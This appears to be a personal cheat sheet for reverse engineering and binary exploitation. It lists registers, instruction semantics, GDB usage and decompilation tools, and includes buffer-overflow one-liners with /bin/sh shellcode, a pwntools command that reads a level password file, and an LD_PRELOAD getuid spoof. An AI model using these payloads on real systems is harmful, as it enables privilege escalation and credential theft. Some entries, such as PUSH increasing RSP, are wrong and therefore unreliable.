ReverseEngineering
ASM
Variables
x64
x32
What is ?
RAX
EAX
Return Value
RCX
ECX
Counter (or Fourth Arg)
RDX
EDX
Third Arg
RSI
ESI
Second Arg
RDI
EDI
First Arg of Function
RSP
ESP
Stack Pointer
RIP
EIP
Next Instruction
R8-R11
r8d-r11d
Scratch register
R12-R15
r12d-r15d
Preserved register
Operation
Operation
Explication
MOV size dest,src
dest ← src
LEA dest,[op]
dest ← addr op
PUSH op
Increase RSP & Store op
POP op
Load op & Discrease RSP
ADD op1,op2
op1 ← op1 + op2
SUB op1,op2
op1 ← op1 - op2
NEG reg
reg ← -reg
INC reg
reg ← reg + 1
DEC reg
reg ← reg - 1
AND op1,op2
op1 ← op1 & op2
OR op1,op2
op1 ← op1
XOR op1,op2
op1 ← op1 ^ op2
CMP op1,op2
op1 - op2
TEST op1,op2
op1 & op2
JMP op
Jump to op
Overflow
Basic
(python -c "import struct; print('A' * (100 - 0) + struct.pack('<I', 0xffffffff))")
Shellcode
(python -c "import struct; print('\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' + 'A' * (100 - 21) + struct.pack('<I', 0xffffffff))")
Shellcode
Cat
python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.cat('/home/users/level05/.pass')); print(shell); print(len(shell))"
Exec sh 1
python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.sh()); print(shell); print(len(shell))"
Exec sh 2
\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
21
GDB
Command
b *0x12345678 # Breakpoint
b strcpy # Breakpoint
r # Run program
r < <(echo lol) # Run with pipe
r arg1 arg2 # Run with arg
c # Continue
n # Next operation
set $eax=0x00 # Set variable
info register # Show Register
Print
x/s "string"
x/d 53
x/x 0xff
help x
print $rax
Get env address
x/10s **(char***)&environ
Peda
Install
git clone https://github.com/longld/peda.git ~/.peda
echo "source ~/.peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"
Binary ninja
Scrap code from html
let result = '';
[...document.querySelectorAll('.LinearDisassemblyLine')].forEach(parent_elmt => {
[...parent_elmt.children].forEach(children_elmt => {
result += children_elmt.textContent
});
result += '\n'
});
console.log(result);
Lib Injection
Recreate getuid function
uid_t getuid(void)
{
return (4242);
}
compile
gcc -shared -fpic lib.c -o libnike.so -m32
run and inject
LD_PRELOAD=./libnike.so ./exec
Decompile Python Executable
Convert executable into .pyc
git clone https://github.com/extremecoders-re/pyinstxtractor
cd pyinstxtractor
python3 pyinstxtractor.py exec
Disassembly .pyc (compatible python 3.9.2)
git clone https://github.com/zrax/pycdc
cd pycdc
cmake
make
./pycdc file.pyc # Convert .pyc into .py
./pycdas file.pyc # Convert .pyc into byte-code disassembly
Macro Office PPTM
Install
sudo pip3 install oletools
Decompress PPTM
olevba -c file.pptm
Last updated